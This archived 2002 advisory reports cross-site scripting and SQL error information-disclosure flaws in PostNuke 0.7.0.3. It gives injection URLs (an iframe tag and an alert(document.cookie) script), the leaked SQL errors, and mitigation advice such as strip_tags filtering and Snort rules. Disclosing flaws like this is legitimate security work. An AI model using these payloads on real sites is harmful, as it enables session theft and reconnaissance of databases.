TUCoPS :: Web :: PHP
:: web5209.htm
25th Mar 2002 [SBWID-5209]
COMMAND
PostNuke various vulns
SYSTEMS AFFECTED
PostNuke .7.0.3
PROBLEM
rootkidd \'Scott\', reported the followin problems :
http://one_of_100\'s_of_sites/modules.php?op=modload&name=<iframe%20src=\"http://www.microsoft.com\"> <-- this is funny :o)
http://one_of_100\'s_of_sites/index.php?catid=<script>alert(document.cookie)</script>
The cookie details are displayed on the page as well as in an alert
window which could lead to a users account being compromised.
The bellow text will be shown on the web page once run.
PHPLive New!
alert(document.cookie)&unique=1015076420651
border=0
alt=\'Click for Live Support!\'>
We also get some cool information from site that we should not-
DB Error: getArticles: 1064: You have an error in your
SQL syntax near \'= ORDER BY nuke_stories.sid
DESC
LIMIT 1\' at line 23
We also get a fully qualified path to the files we hack, allowing one
to guess OS type and other such things.
There are many bugs similar to these with pages other than the examples
shown. Most people think it is just modules.php but this is NOT the
case.
This is an example of some other info\'s that can be retrieved-
22/03/2002,19:32 \"Fehler auf /index.php?
xcontentmode= -> -> /index.php (linked on )
Datenbankfehler: You have an error in your SQL
syntax near \'and scoresum>=\"30\" order by changed
desc \' at line 1 Offending command was: select
name,id,changed,created,type,user,downloads,score
sum,status,preview1,commentscount from content
and scoresum>=\"30\" order by changed desc \"
Error: \"\" Request:\"/index.php?xcontentmode=\"
Method:\"GET\" Agent:\"Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0; T312461)\" IP:\"0.0.0.0\"
Port:\"32069\" \\n
22/03/2002,19:32 \"Fehler auf /index.php?
xcontentmode= -> -> /index.php (linked on )
Datenbankfehler: You have an error in your SQL
syntax near \'and scoresum>=\"30\" order by changed
desc limit 0,10\' at line 1 Offending command was:
select
name,id,changed,created,type,user,downloads,score
sum,status,preview1,commentscount from content
and scoresum>=\"30\" order by changed desc limit
0,10 \" Error: \"\" Request:\"/index.php?xcontentmode=\"
Method:\"GET\" Agent:\"Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0; T312461)\" IP:\"0.0.0.0\"
Port:\"32069\" \\n
SOLUTION
Patch
=====
Newer .7.10 version is vulnerable to css and csrf bugs in some manner
or another. Other bugs are patched.
Also use \"strip_tags($Evil_halt, \"acceptable html \");\", filter
unwanted code being passed to the server, add <>, cookie and other
such characters / words to your snort config and finaly DISABLE error
reporting in php.ini.